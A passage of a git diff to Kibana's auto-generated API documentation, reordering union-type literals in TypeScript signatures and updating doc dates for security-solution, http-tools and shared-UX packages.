\"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }) & { id?: string | undefined; }" + ") => ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }) & { id?: string | undefined; }" ], "path": "packages/kbn-securitysolution-list-utils/src/helpers/index.ts", "deprecated": false, @@ -1137,7 +1137,7 @@ "section": "def-common.FormattedBuilderEntry", "text": "FormattedBuilderEntry" }, - ", newField: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }) => { index: number; updatedEntry: ", + ", newField: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }) => { index: number; updatedEntry: ", { "pluginId": "@kbn/securitysolution-list-utils", "scope": "common", @@ -1182,7 +1182,7 @@ "- newly selected list" ], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }" + "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }" ], "path": "packages/kbn-securitysolution-list-utils/src/helpers/index.ts", "deprecated": false, @@ -2567,7 +2567,7 @@ "label": "hasLargeValueList", "description": [], "signature": [ - "(entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]) => boolean" + "(entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]) => boolean" ], "path": "packages/kbn-securitysolution-list-utils/src/has_large_value_list/index.ts", "deprecated": false, @@ -2580,7 +2580,7 @@ "label": "entries", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" ], "path": "packages/kbn-securitysolution-list-utils/src/has_large_value_list/index.ts", "deprecated": false, @@ -3229,7 +3229,7 @@ "label": "BuilderEntry", "description": [], "signature": [ - "(({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }) & { id?: string | undefined; }) | ", + "(({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }) & { id?: string | undefined; }) | ", { "pluginId": "@kbn/securitysolution-list-utils", "scope": "common", @@ -3288,7 +3288,7 @@ "label": "CreateExceptionListItemBuilderSchema", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }, \"meta\" | \"entries\"> & { meta: { temporaryUuid: string; }; entries: ", + "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }, \"meta\" | \"entries\"> & { meta: { temporaryUuid: string; }; entries: ", { "pluginId": "@kbn/securitysolution-list-utils", "scope": "common", @@ -3422,7 +3422,7 @@ "label": "ExceptionListItemBuilderSchema", "description": [], "signature": [ - "Omit<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }, \"entries\"> & { entries: ", + "Omit<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }, \"entries\"> & { entries: ", { "pluginId": "@kbn/securitysolution-list-utils", "scope": "common", diff --git a/api_docs/kbn_securitysolution_list_utils.mdx b/api_docs/kbn_securitysolution_list_utils.mdx index 8bdbb6e312450..550abeab397a4 100644 --- a/api_docs/kbn_securitysolution_list_utils.mdx +++ b/api_docs/kbn_securitysolution_list_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-list-utils title: "@kbn/securitysolution-list-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-list-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-list-utils'] --- import kbnSecuritysolutionListUtilsObj from './kbn_securitysolution_list_utils.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_rules.devdocs.json b/api_docs/kbn_securitysolution_rules.devdocs.json index f7c30d88d58f1..1617a860e2a7b 100644 --- a/api_docs/kbn_securitysolution_rules.devdocs.json +++ b/api_docs/kbn_securitysolution_rules.devdocs.json @@ -72,7 +72,7 @@ "label": "isRuleType", "description": [], "signature": [ - "(ruleType: unknown) => ruleType is \"eql\" | \"query\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" + "(ruleType: unknown) => ruleType is \"query\" | \"eql\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" ], "path": "packages/kbn-securitysolution-rules/src/utils.ts", "deprecated": false, @@ -231,7 +231,7 @@ "label": "RuleType", "description": [], "signature": [ - "\"eql\" | \"query\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" + "\"query\" | \"eql\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" ], "path": "packages/kbn-securitysolution-rules/src/rule_type_mappings.ts", "deprecated": false, diff --git a/api_docs/kbn_securitysolution_rules.mdx b/api_docs/kbn_securitysolution_rules.mdx index c93b822e3b715..4b0c48b7424b7 100644 --- a/api_docs/kbn_securitysolution_rules.mdx +++ b/api_docs/kbn_securitysolution_rules.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-rules title: "@kbn/securitysolution-rules" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-rules plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-rules'] --- import kbnSecuritysolutionRulesObj from './kbn_securitysolution_rules.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_t_grid.mdx b/api_docs/kbn_securitysolution_t_grid.mdx index df56a5e4f2798..dafe77c50b0a8 100644 --- a/api_docs/kbn_securitysolution_t_grid.mdx +++ b/api_docs/kbn_securitysolution_t_grid.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-t-grid title: "@kbn/securitysolution-t-grid" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-t-grid plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-t-grid'] --- import kbnSecuritysolutionTGridObj from './kbn_securitysolution_t_grid.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_utils.mdx b/api_docs/kbn_securitysolution_utils.mdx index 142f19846129a..e47d2bae61f7c 100644 --- a/api_docs/kbn_securitysolution_utils.mdx +++ b/api_docs/kbn_securitysolution_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-utils title: "@kbn/securitysolution-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-utils'] --- import kbnSecuritysolutionUtilsObj from './kbn_securitysolution_utils.devdocs.json'; diff --git a/api_docs/kbn_server_http_tools.devdocs.json b/api_docs/kbn_server_http_tools.devdocs.json index 2f91a58cf2e7a..b3cc50d874c37 100644 --- a/api_docs/kbn_server_http_tools.devdocs.json +++ b/api_docs/kbn_server_http_tools.devdocs.json @@ -793,7 +793,7 @@ "Type", "; clientAuthentication: ", "Type", - "<\"none\" | \"required\" | \"optional\">; }>" + "<\"optional\" | \"none\" | \"required\">; }>" ], "path": "packages/kbn-server-http-tools/src/ssl/ssl_config.ts", "deprecated": false, diff --git a/api_docs/kbn_server_http_tools.mdx b/api_docs/kbn_server_http_tools.mdx index 0241145158e2f..e78c5bdf707e6 100644 --- a/api_docs/kbn_server_http_tools.mdx +++ b/api_docs/kbn_server_http_tools.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-server-http-tools title: "@kbn/server-http-tools" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/server-http-tools plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/server-http-tools'] --- import kbnServerHttpToolsObj from './kbn_server_http_tools.devdocs.json'; diff --git a/api_docs/kbn_server_route_repository.mdx b/api_docs/kbn_server_route_repository.mdx index 84b972f37420c..5aac51db5a81a 100644 --- a/api_docs/kbn_server_route_repository.mdx +++ b/api_docs/kbn_server_route_repository.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-server-route-repository title: "@kbn/server-route-repository" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/server-route-repository plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/server-route-repository'] --- import kbnServerRouteRepositoryObj from './kbn_server_route_repository.devdocs.json'; diff --git a/api_docs/kbn_shared_svg.mdx b/api_docs/kbn_shared_svg.mdx index 0bbca3c598fb3..0011c0b234fd1 100644 --- a/api_docs/kbn_shared_svg.mdx +++ b/api_docs/kbn_shared_svg.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-svg title: "@kbn/shared-svg" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-svg plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-svg'] --- import kbnSharedSvgObj from './kbn_shared_svg.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_button_exit_full_screen_mocks.mdx b/api_docs/kbn_shared_ux_button_exit_full_screen_mocks.mdx index 6d748a8ba37bf..6ed3fe23ad4ff 100644 --- a/api_docs/kbn_shared_ux_button_exit_full_screen_mocks.mdx +++ b/api_docs/kbn_shared_ux_button_exit_full_screen_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-button-exit-full-screen-mocks title: "@kbn/shared-ux-button-exit-full-screen-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-button-exit-full-screen-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-button-exit-full-screen-mocks'] --- import kbnSharedUxButtonExitFullScreenMocksObj from './kbn_shared_ux_button_exit_full_screen_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_button_toolbar.mdx b/api_docs/kbn_shared_ux_button_toolbar.mdx index 7291e9d778d22..ddbac049d370d 100644 --- a/api_docs/kbn_shared_ux_button_toolbar.mdx +++ b/api_docs/kbn_shared_ux_button_toolbar.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-button-toolbar title: "@kbn/shared-ux-button-toolbar" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-button-toolbar plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-button-toolbar'] --- import kbnSharedUxButtonToolbarObj from './kbn_shared_ux_button_toolbar.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_card_no_data.devdocs.json b/api_docs/kbn_shared_ux_card_no_data.devdocs.json index 1d05bc72098a0..480849c369f6b 100644 --- a/api_docs/kbn_shared_ux_card_no_data.devdocs.json +++ b/api_docs/kbn_shared_ux_card_no_data.devdocs.json @@ -142,7 +142,7 @@ "signature": [ "Partial> & { button?: React.ReactNode; onClick?: React.MouseEventHandler | undefined; description?: React.ReactNode; category?: string | undefined; canAccessFleet?: boolean | undefined; }" + ", \"onClick\" | \"description\" | \"isDisabled\" | \"button\" | \"layout\">> & { button?: React.ReactNode; onClick?: React.MouseEventHandler | undefined; description?: React.ReactNode; category?: string | undefined; canAccessFleet?: boolean | undefined; }" ], "path": "node_modules/@kbn/shared-ux-card-no-data-types/index.d.ts", "deprecated": false, @@ -176,21 +176,21 @@ "\nProps for the `NoDataCard` sevice-connected component." ], "signature": [ - "{ children?: React.ReactNode; className?: string | undefined; id?: string | undefined; lang?: string | undefined; style?: React.CSSProperties | undefined; target?: string | undefined; role?: React.AriaRole | undefined; tabIndex?: number | undefined; display?: \"primary\" | \"success\" | \"accent\" | \"warning\" | \"danger\" | \"subdued\" | \"transparent\" | \"plain\" | undefined; href?: string | undefined; 'aria-activedescendant'?: string | undefined; 'aria-atomic'?: boolean | \"true\" | \"false\" | undefined; 'aria-autocomplete'?: \"none\" | \"list\" | \"inline\" | \"both\" | undefined; 'aria-busy'?: boolean | \"true\" | \"false\" | undefined; 'aria-checked'?: boolean | \"true\" | \"false\" | \"mixed\" | undefined; 'aria-colcount'?: number | undefined; 'aria-colindex'?: number | undefined; 'aria-colspan'?: number | undefined; 'aria-controls'?: string | undefined; 'aria-current'?: boolean | \"true\" | \"false\" | \"page\" | \"step\" | \"location\" | \"date\" | \"time\" | undefined; 'aria-describedby'?: string | undefined; 'aria-details'?: string | undefined; 'aria-disabled'?: boolean | \"true\" | \"false\" | undefined; 'aria-dropeffect'?: \"none\" | \"link\" | \"copy\" | \"execute\" | \"move\" | \"popup\" | undefined; 'aria-errormessage'?: string | undefined; 'aria-expanded'?: boolean | \"true\" | \"false\" | undefined; 'aria-flowto'?: string | undefined; 'aria-grabbed'?: boolean | \"true\" | \"false\" | undefined; 'aria-haspopup'?: boolean | \"dialog\" | \"grid\" | \"listbox\" | \"menu\" | \"tree\" | \"true\" | \"false\" | undefined; 'aria-hidden'?: boolean | \"true\" | \"false\" | undefined; 'aria-invalid'?: boolean | \"true\" | \"false\" | \"grammar\" | \"spelling\" | undefined; 'aria-keyshortcuts'?: string | undefined; 'aria-label'?: string | undefined; 'aria-labelledby'?: string | undefined; 'aria-level'?: number | undefined; 'aria-live'?: \"off\" | \"assertive\" | \"polite\" | undefined; 'aria-modal'?: boolean | \"true\" | \"false\" | undefined; 'aria-multiline'?: boolean | \"true\" | \"false\" | undefined; 'aria-multiselectable'?: boolean | \"true\" | \"false\" | undefined; 'aria-orientation'?: \"horizontal\" | \"vertical\" | undefined; 'aria-owns'?: string | undefined; 'aria-placeholder'?: string | undefined; 'aria-posinset'?: number | undefined; 'aria-pressed'?: boolean | \"true\" | \"false\" | \"mixed\" | undefined; 'aria-readonly'?: boolean | \"true\" | \"false\" | undefined; 'aria-relevant'?: \"all\" | \"text\" | \"additions\" | \"additions removals\" | \"additions text\" | \"removals\" | \"removals additions\" | \"removals text\" | \"text additions\" | \"text removals\" | undefined; 'aria-required'?: boolean | \"true\" | \"false\" | undefined; 'aria-roledescription'?: string | undefined; 'aria-rowcount'?: number | undefined; 'aria-rowindex'?: number | undefined; 'aria-rowspan'?: number | undefined; 'aria-selected'?: boolean | \"true\" | \"false\" | undefined; 'aria-setsize'?: number | undefined; 'aria-sort'?: \"none\" | \"ascending\" | \"descending\" | \"other\" | undefined; 'aria-valuemax'?: number | undefined; 'aria-valuemin'?: number | undefined; 'aria-valuenow'?: number | undefined; 'aria-valuetext'?: string | undefined; dangerouslySetInnerHTML?: { __html: string; } | undefined; onCopy?: React.ClipboardEventHandler | undefined; onCopyCapture?: React.ClipboardEventHandler | undefined; onCut?: React.ClipboardEventHandler | undefined; onCutCapture?: React.ClipboardEventHandler | undefined; onPaste?: React.ClipboardEventHandler | undefined; onPasteCapture?: React.ClipboardEventHandler | undefined; onCompositionEnd?: React.CompositionEventHandler | undefined; onCompositionEndCapture?: React.CompositionEventHandler | undefined; onCompositionStart?: React.CompositionEventHandler | undefined; onCompositionStartCapture?: React.CompositionEventHandler | undefined; onCompositionUpdate?: React.CompositionEventHandler | undefined; onCompositionUpdateCapture?: React.CompositionEventHandler | undefined; onFocus?: React.FocusEventHandler | undefined; onFocusCapture?: React.FocusEventHandler | undefined; onBlur?: React.FocusEventHandler | undefined; onBlurCapture?: React.FocusEventHandler | undefined; onChange?: React.FormEventHandler | undefined; onChangeCapture?: React.FormEventHandler | undefined; onBeforeInput?: React.FormEventHandler | undefined; onBeforeInputCapture?: React.FormEventHandler | undefined; onInput?: React.FormEventHandler | undefined; onInputCapture?: React.FormEventHandler | undefined; onReset?: React.FormEventHandler | undefined; onResetCapture?: React.FormEventHandler | undefined; onSubmit?: React.FormEventHandler | undefined; onSubmitCapture?: React.FormEventHandler | undefined; onInvalid?: React.FormEventHandler | undefined; onInvalidCapture?: React.FormEventHandler | undefined; onLoad?: React.ReactEventHandler | undefined; onLoadCapture?: React.ReactEventHandler | undefined; onError?: React.ReactEventHandler | undefined; onErrorCapture?: React.ReactEventHandler | undefined; onKeyDown?: React.KeyboardEventHandler | undefined; onKeyDownCapture?: React.KeyboardEventHandler | undefined; onKeyPress?: React.KeyboardEventHandler | undefined; onKeyPressCapture?: React.KeyboardEventHandler | undefined; onKeyUp?: React.KeyboardEventHandler | undefined; onKeyUpCapture?: React.KeyboardEventHandler | undefined; onAbort?: React.ReactEventHandler | undefined; onAbortCapture?: React.ReactEventHandler | undefined; onCanPlay?: React.ReactEventHandler | undefined; onCanPlayCapture?: React.ReactEventHandler | undefined; onCanPlayThrough?: React.ReactEventHandler | undefined; onCanPlayThroughCapture?: React.ReactEventHandler | undefined; onDurationChange?: React.ReactEventHandler | 